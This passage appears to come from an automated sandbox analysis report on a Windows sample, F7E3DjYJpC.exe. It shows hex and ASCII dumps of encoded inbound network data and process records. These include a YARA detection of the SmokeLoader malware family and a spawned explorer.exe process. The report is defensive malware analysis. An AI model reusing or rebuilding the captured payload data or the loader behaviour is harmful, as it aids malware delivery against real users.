Qt x RY x RR x Oxk x RY x to x tE x RY x tE x RY x RR x OOY x RY x tO x YR x RY x Qx x OOQ x RR x OOx x RY x tO x kY x RY x Qx x RY x RY x OOR x RY x tO x Oxt x RY x Qk x OxE x RY x OxE x RY x to x kY x RY x QQ x OOQ x R
2021-10-29 18:50:19 UTC	2829	IN	Data Raw: 78 20 52 52 20 78 20 59 4f 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 52 20 78 20 74 51 20 78 20 52 59 20 78 20 74 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 6b 20 78 20 52 59 20 78 20 52 74 20 78 20 59 6f 20 78 20 52 59 20 78 20 74 74 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 74 78 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 51 20 78 20 52 59 20 78 20 74 78 20 78 20 52 52 20 78 20 52 52 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 78 74 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4f 78 74 20 78 Data Ascii: x RR x YO x RY x to x tt x RY x tE x RY x RR x tQ x RY x tx x kO x RY x tE x RY x RY x Kk x RY x Rt x Yo x RY x tt x RY x RY x OxE x RY x tx x tt x RY x kY x RY x RY x KQ x RY x tx x RR x RR x Rk x RY x RR x kk x RY x tO x Oxt x RY x Qk x OxE x RR x Oxt x
2021-10-29 18:50:19 UTC	2833	IN	Data Raw: 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 51 20 78 20 59 6f 20 78 20 52 59 20 78 20 6b 51 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 4f 52 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 52 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 6b 45 20 78 20 74 4b 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: Y x OxE x RY x RQ x Yo x RY x kQ x kO x RR x OOR x RY x tO x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x tR x RY x RQ x tt x RY x kE x tK x OOQ x RY x RY
2021-10-29 18:50:19 UTC	2837	IN	Data Raw: 78 20 52 59 20 78 20 74 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 6b 59 20 78 20 4f 78 45 20 78 20 52 52 20 78 20 4b 51 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 52 74 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 52 20 78 20 74 74 20 78 20 52 59 20 78 20 74 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 51 78 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 6b 4f 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 4f 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 Data Ascii: x RY x tO x kO x RY x kY x OxE x RR x KQ x RY x tO x Yo x RY x RY x RY x RR x OOO x RY x Rt x tE x RY x RY x kO x RR x tt x RY x tO x kY x RY x Qx x OOQ x RR x OxK x RY x tO x OOQ x RY x kO x OOQ x RR x OOk x RY x to x RY x RY x OxO x kO x RR x OoO x RY x
2021-10-29 18:50:19 UTC	2841	IN	Data Raw: 4f 6f 6f 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 6b 4f 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 52 20 78 20 51 74 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 74 6b 20 78 20 4b 6b 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 78 6b 20 78 20 6b 78 20 78 20 6b 45 20 78 20 74 4b 20 78 20 6b 51 20 78 20 74 51 20 78 20 52 6b 20 78 20 6b 51 20 78 20 4f 78 59 20 78 20 74 45 20 78 20 74 6f 20 78 20 52 52 20 78 20 4b 51 20 78 20 6b 51 20 78 20 4f 78 51 20 78 20 4f 6f 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 6b 52 20 78 20 6b 6f 20 78 20 4f 4f 6b 20 78 20 51 74 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f Data Ascii: Ooo x QQ x Yx x Yt x OoO x kO x kk x tK x OxR x Qt x tO x Oxk x Kk x Qx x kt x tk x Kk x Oxx x kk x tK x Oxk x kx x kE x tK x kQ x tQ x Rk x kQ x OxY x tE x to x RR x KQ x kQ x OxQ x Oox x OOo x kQ x Kk x OOR x Oxk x OxO x kR x ko x OOk x Qt x Yx x kR x O
2021-10-29 18:50:19 UTC	2844	IN	Data Raw: 59 20 78 20 59 6f 20 78 20 74 52 20 78 20 6b 74 20 78 20 74 45 20 78 20 59 45 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 52 6b 20 78 20 4f 78 4b 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 52 6b 20 78 20 6b 59 20 78 20 4f 4f 51 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 52 51 20 78 20 4b 51 20 78 20 6b 51 20 78 20 6b 4b 20 78 20 4f 78 6b 20 78 20 4f 78 4b 20 78 20 4f 78 6f 20 78 20 6b 45 20 78 20 74 45 20 78 20 4b 45 20 78 20 6b 78 20 78 20 52 74 20 78 20 59 74 20 78 20 4f 6f 6f 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 4b 20 78 20 4b 6b 20 78 20 51 78 20 78 20 6b 74 20 78 20 6b 6f 20 78 20 6b 78 20 78 20 6b 59 20 78 20 4f 6f 6f 20 78 20 59 6f 20 78 20 Data Ascii: Y x Yo x tR x kt x tE x YE x kQ x kK x kY x OOR x tk x Rk x OxK x OxQ x Qx x Rk x kY x OOQ x kQ x kK x RQ x KQ x kQ x kK x Oxk x OxK x Oxo x kE x tE x KE x kx x Rt x Yt x Ooo x Oxx x kk x RR x OOQ x Qk x YO x tK x Kk x Qx x kt x ko x kx x kY x Ooo x Yo x
2021-10-29 18:50:19 UTC	2849	IN	Data Raw: 52 51 20 78 20 6b 6f 20 78 20 52 51 20 78 20 4f 78 6b 20 78 20 74 51 20 78 20 6b 6f 20 78 20 4b 51 20 78 20 52 52 20 78 20 52 52 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 6f 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 51 20 78 20 6b 74 20 78 20 74 78 20 78 20 52 52 20 78 20 52 52 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 6f 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 59 20 78 20 59 45 20 78 20 74 6f 20 78 20 6b 74 20 78 20 74 78 20 78 20 4f 78 4b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 6b 6f 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 59 20 78 20 59 45 20 78 20 74 6f 20 78 20 6b 59 20 78 Data Ascii: RQ x ko x RQ x Oxk x tQ x ko x KQ x RR x RR x ko x RQ x ko x tK x kK x Oxt x Oxx x kQ x kt x tx x RR x RR x ko x RQ x ko x tK x kK x Oxt x Oxx x kO x kO x kY x ko x RQ x kE x kY x YE x to x kt x tx x OxK x kO x kO x kY x ko x RQ x kE x kY x YE x to x kY x
2021-10-29 18:50:19 UTC	2853	IN	Data Raw: 20 78 20 59 78 20 78 20 52 74 20 78 20 59 59 20 78 20 74 52 20 78 20 52 52 20 78 20 4b 51 20 78 20 6b 6f 20 78 20 52 74 20 78 20 4f 78 52 20 78 20 74 4f 20 78 20 59 4f 20 78 20 4f 78 51 20 78 20 74 6b 20 78 20 4f 78 51 20 78 20 4f 4f 51 20 78 20 4b 45 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 51 78 20 78 20 4b 51 20 78 20 74 52 20 78 20 4f 78 6b 20 78 20 74 6b 20 78 20 52 52 20 78 20 6b 59 20 78 20 6b 51 20 78 20 74 6f 20 78 20 51 51 20 78 20 4f 4f 6b 20 78 20 4b 6b 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 52 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 78 20 78 20 4f 4f 74 20 78 20 59 4f 20 78 20 59 45 20 78 20 74 4b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 6b 45 20 78 20 4f 4f 6f 20 78 20 4b 45 20 78 20 6b 4f 20 78 20 51 78 20 78 20 74 78 Data Ascii: x Yx x Rt x YY x tR x RR x KQ x ko x Rt x OxR x tO x YO x OxQ x tk x OxQ x OOQ x KE x OOo x OxQ x Qx x KQ x tR x Oxk x tk x RR x kY x kQ x to x QQ x OOk x Kk x Yt x OxQ x OxY x Rk x OOk x Oxx x OOt x YO x YE x tK x OOO x YK x kE x OOo x KE x kO x Qx x tx
2021-10-29 18:50:19 UTC	2857	IN	Data Raw: 20 4f 4f 74 20 78 20 6b 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 4f 52 20 78 20 74 74 20 78 20 52 52 20 78 20 59 6f 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 6b 6b 20 78 20 74 74 20 78 20 52 52 20 78 20 6b 74 20 78 20 52 52 20 78 20 52 51 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4b 51 20 78 20 51 51 20 78 20 74 6f 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 6b 6f 20 78 20 52 59 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 6f 4f 20 78 20 51 51 20 78 20 59 78 20 78 20 59 74 20 78 20 4f 78 51 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 59 45 20 78 20 4f 4f 74 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 4f 20 78 20 4f 4f 51 Data Ascii: OOt x kQ x Yx x Yt x OOR x tt x RR x Yo x tO x RY x KQ x kY x Oxx x RQ x kO x kO x kk x tt x RR x kt x RR x RQ x YO x tk x KQ x QQ x to x RR x OOk x QQ x OOx x ko x RY x Qk x OxQ x Oxk x OoO x QQ x Yx x Yt x OxQ x Oxx x Rt x YE x OOt x Qx x kk x kO x OOQ
2021-10-29 18:50:19 UTC	2861	IN	Data Raw: 20 52 6b 20 78 20 4b 51 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 51 20 78 20 59 4f 20 78 20 6b 6f 20 78 20 4f 4f 6f 20 78 20 51 78 20 78 20 59 78 20 78 20 59 52 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 52 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 51 78 20 78 20 52 6b 20 78 20 52 51 20 78 20 4f 78 74 20 78 20 74 74 20 78 20 52 74 20 78 20 74 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 4b 51 20 78 20 6b 59 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 6f 78 20 78 20 74 74 20 78 20 51 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 74 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 78 20 78 20 51 6b 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 6b 45 20 78 20 6b Data Ascii: Rk x KQ x tk x Oxk x kQ x YO x ko x OOo x Qx x Yx x YR x OxE x kK x tO x Oxk x OOR x Qt x kk x ko x Oxk x Qx x Rk x RQ x Oxt x tt x Rt x tE x tO x RY x KQ x kY x RQ x RY x Oox x tt x Qk x kY x Yx x kR x OxR x Oxx x tO x Oxk x OOx x Qk x OoO x RR x kE x k
2021-10-29 18:50:19 UTC	2865	IN	Data Raw: 51 20 78 20 52 52 20 78 20 52 52 20 78 20 74 4f 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 4b 74 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 4f 78 45 20 78 20 4f 4f 4b 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 52 51 20 78 20 74 78 20 78 20 52 52 20 78 20 6b 4f 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 6b 51 20 78 20 4f 6f 6f 20 78 20 51 74 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 51 51 20 78 20 52 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 59 78 20 78 20 74 6b 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 52 74 20 78 20 59 45 20 78 20 4b 51 20 78 20 51 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 74 6f 20 78 20 74 Data Ascii: Q x RR x RR x tO x OOO x OOQ x Qt x Rk x RY x Kt x RR x OxE x OxE x OOK x RR x OxE x RQ x tx x RR x kO x QQ x OOQ x RY x OOO x kQ x Ooo x Qt x to x ko x Kk x QQ x Rk x OOO x OOk x tR x Yx x tk x OoO x Oxx x Rt x YE x KQ x QQ x Yx x kR x OoO x Oxx x to x t
2021-10-29 18:50:19 UTC	2881	IN	Data Raw: 20 78 20 74 45 20 78 20 4f 78 59 20 78 20 4f 78 52 20 78 20 74 6b 20 78 20 4b 45 20 78 20 4f 78 59 20 78 20 4f 4f 51 20 78 20 59 59 20 78 20 4f 6f 78 20 78 20 4f 6f 78 20 78 20 6b 51 20 78 20 6b 6f 20 78 20 4f 4f 4b 20 78 20 4b 45 20 78 20 6b 78 20 78 20 6b 74 20 78 20 4f 4f 59 20 78 20 6b 52 20 78 20 52 52 20 78 20 4f 4f 78 20 78 20 51 74 20 78 20 51 51 20 78 20 6b 74 20 78 20 74 51 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 4f 78 20 78 20 6b 4f 20 78 20 4f 4f 4b 20 78 20 4f 78 6f 20 78 20 4b 45 20 78 20 74 6f 20 78 20 4f 6f 6f 20 78 20 6b 78 20 78 20 4f 78 4b 20 78 20 4b 74 20 78 20 4f 4f 45 20 78 20 4f 4f 6b 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 59 59 20 78 20 6b 74 20 78 20 74 6f 20 78 20 59 6f 20 78 20 4f 6f 4f 20 78 20 74 45 20 78 20 4b 51 20 Data Ascii: x tE x OxY x OxR x tk x KE x OxY x OOQ x YY x Oox x Oox x kQ x ko x OOK x KE x kx x kt x OOY x kR x RR x OOx x Qt x QQ x kt x tQ x Yt x kk x OOx x kO x OOK x Oxo x KE x to x Ooo x kx x OxK x Kt x OOE x OOk x OxQ x OxY x YY x kt x to x Yo x OoO x tE x KQ
2021-10-29 18:50:19 UTC	2889	IN	Data Raw: 52 59 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 52 74 20 78 20 4f 78 74 20 78 20 59 45 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 4f 6f 4f 20 78 20 52 52 20 78 20 74 59 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4f 6f 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 4f 78 74 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 52 6b 20 78 20 52 59 20 78 20 6b 45 20 78 20 52 52 20 78 20 4f 78 45 20 78 20 74 6b 20 78 20 6b 52 20 78 20 52 52 20 78 20 52 59 20 78 20 51 51 20 78 20 6b 4b 20 78 20 52 74 20 78 20 4b 6b 20 78 20 4f 4f 6f 20 78 20 4f 78 6b 20 78 20 51 51 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 6b 45 20 78 20 52 52 20 78 20 52 6b 20 78 20 51 74 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 59 45 20 78 20 74 74 20 78 20 6b Data Ascii: RY x OxE x kK x Rt x Oxt x YE x Oxk x Oxx x OoO x RR x tY x Qx x kk x tK x Ooo x Qx x kk x Oxt x Oox x tx x Rk x RY x kE x RR x OxE x tk x kR x RR x RY x QQ x kK x Rt x Kk x OOo x Oxk x QQ x OOx x tk x Oxk x OxO x kE x RR x Rk x Qt x kk x ko x YE x tt x k
2021-10-29 18:50:19 UTC	2905	IN	Data Raw: 45 20 78 20 51 6b 20 78 20 6b 59 20 78 20 4b 45 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 59 6f 20 78 20 6b 45 20 78 20 4f 4f 45 20 78 20 51 74 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 6b 59 20 78 20 74 6b 20 78 20 4f 4f 4f 20 78 20 59 6f 20 78 20 4f 4f 45 20 78 20 52 51 20 78 20 59 78 20 78 20 6b 45 20 78 20 59 74 20 78 20 4f 6f 6f 20 78 20 6b 6b 20 78 20 4f 4f 6f 20 78 20 59 74 20 78 20 4f 6f 6f 20 78 20 52 51 20 78 20 4f 4f 51 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 4b 45 20 78 20 59 45 20 78 20 6b 4f 20 78 20 4f 4f 78 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 6b 78 20 78 20 4f 4f 51 20 78 20 51 78 20 78 20 6b 6b 20 78 20 59 52 20 78 20 51 6b 20 78 20 4b 6b 20 78 20 4f 78 6b 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 6b 74 20 78 20 Data Ascii: E x Qk x kY x KE x OoO x YY x Yo x kE x OOE x Qt x OOk x OxK x kt x kY x tk x OOO x Yo x OOE x RQ x Yx x kE x Yt x Ooo x kk x OOo x Yt x Ooo x RQ x OOQ x Rk x OxE x KE x YE x kO x OOx x OxY x tK x kx x OOQ x Qx x kk x YR x Qk x Kk x Oxk x Rk x OxE x kt x
2021-10-29 18:50:19 UTC	2921	IN	Data Raw: 20 4f 78 6b 20 78 20 4f 4f 4b 20 78 20 4f 4f 6b 20 78 20 4f 78 4b 20 78 20 4f 4f 51 20 78 20 4f 78 78 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 4f 4f 59 20 78 20 4f 4f 4f 20 78 20 4f 78 6f 20 78 20 4f 78 6f 20 78 20 4f 6f 78 20 78 20 45 74 20 78 20 4f 4f 74 20 78 20 45 74 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 51 6b 20 78 20 51 74 20 78 20 4f 6f 4f 20 78 20 4f 4f 6b 20 78 20 4f 4f 6f 20 78 20 4f 6f 78 20 78 20 4f 6f 78 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 4f 4f 78 20 78 20 51 74 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 4f 78 78 20 78 20 45 74 20 78 20 4f 4f 4f 20 78 20 45 74 20 78 20 4f 6f 6f 20 78 20 4f 78 78 20 78 20 4f 6f 6f 20 78 20 4f 78 4b 20 78 20 4f 6f 78 20 78 20 4f 4f 4b 20 78 20 51 Data Ascii: Oxk x OOK x OOk x OxK x OOQ x Oxx x Oxk x OOO x OOY x OOO x Oxo x Oxo x Oox x Et x OOt x Et x OOQ x Qt x Qk x Qt x OoO x OOk x OOo x Oox x Oox x Et x OOY x Et x Qt x OOQ x OOx x Qt x OxR x Oxx x Oxx x Et x OOO x Et x Ooo x Oxx x Ooo x OxK x Oox x OOK x Q
2021-10-29 18:50:19 UTC	2937	IN	Data Raw: 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 51 6b 20 78 20 4f 4f 45 20 78 20 4f 4f 59 20 78 20 51 51 20 78 20 45 74 20 78 20 4f 45 20 78 20 4f 78 20 78 20 45 74 20 78 20 4f 78 51 20 78 20 51 51 20 78 20 4f 78 59 20 78 20 4f 4f 6f 20 78 20 45 74 20 78 20 4f 4f 59 20 78 20 45 74 20 78 20 4f 78 59 20 78 20 4f 78 59 20 78 20 4f 4f 4b 20 78 20 4f 4f 59 20 78 20 4f 4f 4b 20 78 20 4f 78 52 20 78 20 4f 78 74 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 45 74 20 78 20 51 51 20 78 20 45 74 20 78 20 4f 4f 4f 20 78 20 4f 4f 78 20 78 20 4f 78 74 20 78 20 51 6b 20 78 20 51 51 20 78 20 51 51 20 78 20 4f 78 78 20 78 20 45 74 20 78 20 45 6f 20 78 20 45 74 20 78 20 4f 78 78 20 78 20 4f 78 52 20 78 20 4f 78 45 20 78 20 4f 78 Data Ascii: Oxk x OOk x OOK x OxY x Qk x OOE x OOY x QQ x Et x OE x Ox x Et x OxQ x QQ x OxY x OOo x Et x OOY x Et x OxY x OxY x OOK x OOY x OOK x OxR x Oxt x Oxk x OxO x Oox x Et x QQ x Et x OOO x OOx x Oxt x Qk x QQ x QQ x Oxx x Et x Eo x Et x Oxx x OxR x OxE x Ox
2021-10-29 18:50:19 UTC	2953	IN	Data Raw: 4f 20 78 20 4f 4f 45 20 78 20 4f 4f 74 20 78 20 4f 78 52 20 78 20 4f 4f 78 20 78 20 4f 78 52 20 78 20 4f 78 74 20 78 20 45 74 20 78 20 6b 45 20 78 20 45 74 20 78 20 4f 78 45 20 78 20 51 6b 20 78 20 4f 78 4b 20 78 20 4f 78 4f 20 78 20 45 74 20 78 20 45 6f 20 78 20 45 74 20 78 20 4f 6f 78 20 78 20 4f 78 51 20 78 20 4f 78 59 20 78 20 4f 78 6b 20 78 20 4f 4f 4b 20 78 20 4f 78 4b 20 78 20 4f 4f 74 20 78 20 4f 4f 6f 20 78 20 4f 6f 6f 20 78 20 4f 4f 78 20 78 20 51 6b 20 78 20 4f 78 74 20 78 20 4f 78 4f 20 78 20 4f 78 59 20 78 20 45 74 20 78 20 4b 74 20 78 20 45 74 20 78 20 4f 78 4f 20 78 20 4f 78 59 20 78 20 4f 4f 74 20 78 20 4f 78 6b 20 78 20 4f 4f 6f 20 78 20 51 6b 20 78 20 4f 4f 52 20 78 20 4f 4f 4f 20 78 20 4f 4f 6f 20 78 20 4f 4f 45 20 78 20 45 74 20 78 20 Data Ascii: O x OOE x OOt x OxR x OOx x OxR x Oxt x Et x kE x Et x OxE x Qk x OxK x OxO x Et x Eo x Et x Oox x OxQ x OxY x Oxk x OOK x OxK x OOt x OOo x Ooo x OOx x Qk x Oxt x OxO x OxY x Et x Kt x Et x OxO x OxY x OOt x Oxk x OOo x Qk x OOR x OOO x OOo x OOE x Et x
2021-10-29 18:50:19 UTC	2969	IN	Data Raw: 20 78 20 52 52 20 78 20 4f 4f 4f 20 78 20 4f 6f 78 20 78 20 45 6f 20 78 20 74 4f 20 78 20 4f 4f 4b 20 78 20 51 74 20 78 20 4f 4f 6f 20 78 20 4f 78 4b 20 78 20 4f 78 59 20 78 20 51 51 20 78 20 4f 4f 59 20 78 20 45 6f 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 51 74 20 78 20 4f 4f 6f 20 78 20 4f 4f 52 20 78 20 4f 78 4f 20 78 20 4f 4f 4b 20 78 20 78 20 6f 51 20 6b 52 20 78 20 74 74 20 78 20 4f 4f 51 20 78 20 51 74 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 45 6f 20 78 20 6b 45 20 78 20 6b 52 20 78 20 74 4f 20 78 20 52 59 20 78 20 45 6f 20 78 20 74 45 20 78 20 74 45 20 78 20 78 20 4f 4f 20 4f 4f 78 20 78 20 4f 4f 4f 20 78 20 74 59 20 78 20 4f 78 4f 20 78 20 4f 6f 4f 20 78 20 78 20 6f 4f 20 4f 4f 6f 20 78 20 4f 4f 4f 20 78 20 4f 4f 51 20 78 20 4f 78 4f 20 78 Data Ascii: x RR x OOO x Oox x Eo x tO x OOK x Qt x OOo x OxK x OxY x QQ x OOY x Eo x RY x Oxx x Qt x OOo x OOR x OxO x OOK x x oQ kR x tt x OOQ x Qt x OOK x OxO x Eo x kE x kR x tO x RY x Eo x tE x tE x x OO OOx x OOO x tY x OxO x OoO x x oO OOo x OOO x OOQ x OxO x
2021-10-29 18:50:19 UTC	2985	IN	Data Raw: 4f 78 20 59 20 45 20 74 20 4f 20 59 20 45 20 74 20 4f 20 51 20 45 20 74 20 4f 20 4f 4f 20 59 52 20 74 20 4b 4f 20 4f 59 20 4f 74 20 52 78 20 4f 59 20 4f 74 20 52 4b 20 6f 4b 20 6f 4b 20 6f 20 4f 74 20 4b 6b 20 4f 74 20 74 6f 20 4f 74 20 4b 4b 20 6f 4b 20 4f 4f 20 6f 51 20 59 20 4f 4f 20 4f 59 20 59 20 52 51 20 6f 51 20 59 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 74 20 4f 59 20 4f 74 20 59 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 6f 20 59 20 78 20 4f 20 6f 4b 20 4f 59 20 4f 20 4b 20 78 20 4f 20 6f 4b 20 4f 78 20 6b 20 78 20 45 20 4f 20 4f 6b 20 4f 6f 51 20 4f 52 4f 20 6b 20 59 20 45 20 45 6f 20 78 20 4f 78 20 59 20 78 20 4f 20 6b 20 4f 6b 20 6f 51 20 6b 20 78 20 4b 20 4f 20 6f 51 20 59 Data Ascii: Ox Y E t O Y E t O Q E t O OO YR t KO OY Ot Rx OY Ot RK oK oK o Ot Kk Ot to Ot KK oK OO oQ Y OO OY Y RQ oQ Y o o o o o o o o o o t OY Ot Yo o o o o o o o o o o o o o o o Y x O oK OY O K x O oK Ox k x E O Ok OoQ ORO k Y E Eo x Ox Y x O k Ok oQ k x K O oQ Y

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: F7E3DjYJpC.exe PID: 6476 Parent PID: 6128

General

Start time:	20:48:44
Start date:	29/10/2021
Path:	C:\Users\user\Desktop\F7E3DjYJpC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: F7E3DjYJpC.exe PID: 6860 Parent PID: 6476

General

Start time:	20:48:50
Start date:	29/10/2021
Path:	C:\Users\user\Desktop\F7E3DjYJpC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\F7E3DjYJpC.exe'
Imagebase:	0x400000
File size:	349184 bytes
MD5 hash:	537AD79DD97C59FCD1DF5D8A26256192
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6860

General

Start time:	20:48:57
Start date:	29/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
